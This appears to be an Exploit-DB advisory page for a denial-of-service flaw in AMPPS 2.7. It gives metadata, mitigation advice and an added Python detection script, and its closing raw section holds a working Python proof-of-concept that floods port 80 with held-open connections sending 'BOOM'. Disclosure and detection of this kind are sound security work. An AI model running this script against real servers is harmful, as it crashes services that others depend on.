Vendor: Ampps
By: Ihsan Sencan
CVSS: 7.5 (HIGH)
Category: Denial of Service
CWE: 400
Product Name: Ampps
Affected Version From: 2.7
Affected Version To: 2.7
Patch Exists: YES
Related CWE: N/A
CPE: a:ampps:ampps:2.7
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
Year: 2018

AMPPS 2.7 – Denial of Service (PoC)

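AMPPS 2.7 is vulnerable to a denial-of-service attack. An attacker can send a 'BOOM' string to the target server on port 80, causing the server to crash. This can be done with a simple Python script: the PoC below opens connections in a loop, sends the string on each one, and keeps them open until a connection attempt fails.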

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of AMPPS. Additionally, administrators should ensure that the server is not exposed to the public internet.
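
For detection, the following added example (not part of the original advisory or PoC) flags the traffic pattern the PoC produces: one source holding many open connections whose first bytes are not an HTTP request line. The event tuple layout, the `max_open` threshold, the function name and the sample data are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# An HTTP/1.x request starts with: METHOD SP request-target SP HTTP-version
REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/\d\.\d\r?\n")

def flag_sources(events, max_open=3):
    """Return source IPs that held more than max_open simultaneous
    connections whose first bytes were not an HTTP request line.

    events: (time, src_ip, conn_id, kind, data), kind is "data" or "close".
    This tuple layout is an assumption of the example, not a real log format.
    """
    seen = set()                  # connections whose first payload was inspected
    suspect = defaultdict(set)    # src_ip -> open connections with bad first bytes
    flagged = set()
    for _t, src, conn, kind, data in sorted(events, key=lambda e: e[0]):
        if kind == "data" and conn not in seen:
            seen.add(conn)
            if not REQUEST_LINE.match(data):
                suspect[src].add(conn)
                if len(suspect[src]) > max_open:
                    flagged.add(src)
        elif kind == "close":
            seen.discard(conn)
            suspect[src].discard(conn)
    return flagged

# Constructed sample events (documentation-range addresses).
SAMPLE_EVENTS = []
for i in range(5):   # many connections, non-HTTP payload, never closed
    SAMPLE_EVENTS.append((i, "192.0.2.10", f"a{i}", "data", b"BOOM"))
for i in range(5):   # malformed but sequential: each closed before the next
    SAMPLE_EVENTS.append((10 + i, "203.0.113.5", f"b{i}", "data", b"\x16\x03\x01"))
    SAMPLE_EVENTS.append((10 + i + 0.5, "203.0.113.5", f"b{i}", "close", None))
# Ordinary client sending a well-formed request and closing.
SAMPLE_EVENTS.append((20, "198.51.100.7", "c0", "data",
                      b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"))
SAMPLE_EVENTS.append((21, "198.51.100.7", "c0", "close", None))

if __name__ == "__main__":
    print(sorted(flag_sources(SAMPLE_EVENTS)))
```

Clients that split a valid request line across TCP segments would need buffering before the check, and `max_open` should be tuned to the server's normal per-client concurrency.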

Exploit-DB raw data:

# Exploit Title: AMPPS 2.7 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.ampps.com/
# Software Link: https://kent.dl.sourceforge.net/project/ampps/2.7/Ampps-2.7-setup.exe
# Version: 2.7
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

#!/usr/bin/python
import socket

print """
         \\\|///
       \\  - -  //
        (  @ @ )
 ----oOOo--(_)-oOOo----
   AMPPS 2.7
   Ihsan Sencan
 ---------------Ooooo----
                (   )
       ooooO     ) /
       (   )    (_/
        \ (
         \_)
"""
Ip = raw_input("[Ip]: ")
Port = 80 # Default port
 
d=[]
c=0
while 1:
    try:
        d.append(socket.create_connection((Ip,Port)))
        d[c].send("BOOM")
        print "Sie!"
        c+=1
    except socket.error: 
        print "Done!"
        raw_input()
        break